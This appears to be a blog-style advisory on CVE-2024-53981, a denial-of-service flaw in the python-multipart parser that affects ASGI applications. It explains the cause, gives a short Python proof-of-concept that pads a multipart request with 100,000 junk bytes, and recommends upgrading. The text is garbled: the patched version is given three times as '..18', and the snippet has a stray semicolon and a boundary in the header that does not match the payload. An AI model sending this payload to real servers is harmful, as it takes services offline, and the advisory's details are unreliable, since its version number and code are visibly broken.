A newly discovered vulnerability found in the python-multipart library, identified as CVE-2024-53981, could potentially lead to denial of service (DoS) attacks in ASGI (Asynchronous Server Gateway Interface) applications when left unpatched. This vulnerability has been fixed in the version ..18 of the python-multipart library. In this post, we will discuss the details of this vulnerability, including an overview of python-multipart, how the vulnerability can be exploited, and how to mitigate the risk posed by this issue.
Overview of Python-multipart
Python-multipart is a streaming multipart parser for Python, commonly used for parsing form data in web applications. It efficiently handles large file uploads and can efficiently parse data without loading the entire file into memory. More information about python-multipart can be found in its official repository on GitHub (https://github.com/andrew-d/python-multipart).
Vulnerability Details
When parsing form data, python-multipart skips line breaks (CR \r or LF \n) in front of the first boundary and any tailing bytes after the last boundary. This process takes place one byte at a time and emits a log event each time this occurs. In specific situations, this may cause excessive logging for certain inputs.
Attack Vector
An attacker can exploit this vulnerability in the following manner: They can send a malicious request containing a significant amount of data placed either before the first or after the last boundary. This will then cause high CPU load and effectively stall the processing thread for an extended period of time. In the case of ASGI applications, this will stall the event loop and prevent other requests from being processed, thus resulting in a denial of service (DoS).
Exploit Code Snippet
import requests
url = "http://example.com/upload";
data = b'a' * 100000
headers = {
"Content-Type": "multipart/form-data; boundary=---1234---"
}
payload = data + b'\r\n-----1234-----\r\nContent-Disposition: form-data; name="file"; filename="test.txt"\r\n\r\nHello, World!\r\n-----1234-----\r\n'
response = requests.post(url, headers=headers, data=payload)
print(response.text)
Mitigation
To mitigate this issue, developers must update their python-multipart library to version ..18 or later. This can be done using pip, the Python package manager, by executing the following command:
pip install --upgrade python-multipart
Conclusion
In summary, the CVE-2024-53981 vulnerability poses a significant risk to ASGI applications, as an attacker can exploit this issue to cause a denial of service attack. To mitigate this risk, it is essential to ensure that your application is using python-multipart version ..18 or later.
Timeline
Published on: 12/02/2024 16:15:14 UTC